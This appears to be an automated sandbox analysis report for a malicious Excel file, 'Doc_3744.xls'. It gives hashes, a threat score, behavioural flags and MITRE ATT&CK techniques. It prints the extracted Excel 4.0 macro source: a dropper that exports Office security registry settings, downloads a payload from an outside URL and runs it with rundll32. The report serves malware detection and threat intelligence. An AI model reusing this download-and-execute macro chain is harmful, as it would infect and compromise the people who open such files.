5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a

Target

Doc_3744.xls
Size

62KB
Sample

210227-7c1xkzg346
MD5

47e22049644647ee854cedfe077156e7
SHA1

20ad9f47616a8272dece2ec1039a88c09412c97c
SHA256

5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a
SHA512

1eeb87173378f4d0e157ee42f5b28e48ff84a35b44d71f004a6180cc2bdbc09e45c071adc7ab0a94c75071fbe3ee13b939ee8cb216b6f2e06c9c24ca34dbbf1b

Score

10^/10

macro xlm

Malware Config

Extracted

Language

xlm4.0

Source

1
=CALL("Xlcall32", "Excel4", "JR", 4)
2
=CALL("Shell32", "ShellExecuteA", "JCCCJJ", 0, "open", "C:\Windows\system32\reg.exe", "EXPORT HKCU\Software\Microsoft\Office\14.0\Excel\Security C:\Users\Public\Documents\icSz4h.txt /y", 0, 5)
3
=CALL("urlmon", "URLDownloadToFileA", "JCCJJ", 0, "https://hrdgschool.com/logs.php", "C:\Users\Public\Documents\f4myZ.txt", 0, 0)
4
=CALL("Shell32", "ShellExecuteA", "JCCCJJ", 0, "open", "C:\Windows\system32\rundll32.exe", "C:\Users\Public\Documents\f4myZ.txt,DllRegisterServer ", 0, 5)

URLs

xlm40.dropper

https://hrdgschool.com/logs.php

Targets

- Target
  
  Doc_3744.xls
- Size
  
  62KB
- MD5
  
  47e22049644647ee854cedfe077156e7
- SHA1
  
  20ad9f47616a8272dece2ec1039a88c09412c97c
- SHA256
  
  5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a
- SHA512
  
  1eeb87173378f4d0e157ee42f5b28e48ff84a35b44d71f004a6180cc2bdbc09e45c071adc7ab0a94c75071fbe3ee13b939ee8cb216b6f2e06c9c24ca34dbbf1b
Score

10^/10
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- Deletes itself
behavioral1 behavioral2

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Tasks

Resubmissions

Sharing

General

Malware Config

Extracted

Targets

Process spawned unexpected child process

Deletes itself

MITRE ATT&CK Enterprise v6

Tasks

static1

behavioral1

behavioral2

We care about your privacy.